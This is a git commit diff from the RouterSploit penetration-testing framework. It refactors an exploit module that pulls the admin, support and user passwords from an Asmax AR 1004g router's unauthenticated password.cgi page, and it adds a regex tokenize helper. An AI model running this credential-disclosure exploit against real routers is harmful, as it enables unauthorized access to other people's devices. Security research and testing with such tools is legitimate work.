Merge branch 'dev'

83eb1a61 · fwkz · e13bfd38 · 206a70c0 · 83eb1a61 · 83eb1a61
Commit 83eb1a61 authored Jul 16, 2016 by fwkz
Showing with 39 additions and 16 deletions

__init__.py routersploit/__init__.py +1 -0

ar_1004g_password_disclosure.py ...it/modules/exploits/asmax/ar_1004g_password_disclosure.py +11 -15

utils.py routersploit/utils.py +27 -1

No files found.
--- a/routersploit/__init__.py
+++ b/routersploit/__init__.py
@@ -13,6 +13,7 @@ from routersploit.utils import (
    multi,
    index_modules,
    ssh_interactive,
+    tokenize,
 )
 from routersploit import exploits

--- a/routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
+++ b/routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
-import re
 from routersploit import (
    exploits,
-    print_status,
    print_error,
    print_success,
    print_table,
    http_request,
    mute,
    validators,
+    tokenize,
 )
@@ -39,21 +37,19 @@ class Exploit(exploits.Exploit):
        creds = []
        url = "{}:{}/password.cgi".format(self.target, self.port)
-        response = http_request(method="GET", url=url)
+        try:
-        if response is None:
+            response = http_request(method="GET", url=url).text
+        except AttributeError:
            return
-        admin = re.findall("pwdAdmin = '(.+?)'", response.text)
+        tokens = [
-        if admin:
+            ("Admin", r"pwdAdmin = '(.+?)'"),
-            creds.append(('admin', admin[0]))
+            ("Support", r"pwdSupport = '(.+?)'"),
+            ("User", r"pwdUser = '(.+?)'")
-        support = re.findall("pwdSupport = '(.+?)'", response.text)
+        ]
-        if support:
-            creds.append(('support', support[0]))
-        user = re.findall("pwdUser = '(.+?)'", response.text)
+        for token in tokenize(tokens, response):
-        if user:
+            creds.append((token.typ, token.value[-1]))
-            creds.append(('user', user[0]))
        if creds:
            print_success("Credentials found!")

--- a/routersploit/utils.py
+++ b/routersploit/utils.py
@@ -4,9 +4,10 @@ from __future__ import absolute_import
 import threading
 import os
 import sys
+import re
+import collections
 import random
 import string
-import socket
 import importlib
 import select
 import socket
@@ -507,3 +508,28 @@ def windows_shell(chan):
            chan.send(d)
    except:
        pass
+def tokenize(token_specification, text):
+    Token = collections.namedtuple('Token', ['typ', 'value', 'line', 'column', 'mo'])
+    token_specification.extend((
+        ('NEWLINE', r'\n'),          # Line endings
+        ('SKIP', r'.'),              # Any other character
+    ))
+    tok_regex = '|'.join('(?P<%s>%s)' % pair for pair in token_specification)
+    line_num = 1
+    line_start = 0
+    for mo in re.finditer(tok_regex, text):
+        kind = mo.lastgroup
+        value = filter(lambda x: x is not None, mo.groups())
+        if kind == 'NEWLINE':
+            line_start = mo.end()
+            line_num += 1
+        elif kind == 'SKIP':
+            pass
+        else:
+            column = mo.start() - line_start
+            yield Token(kind, value, line_num, column, mo)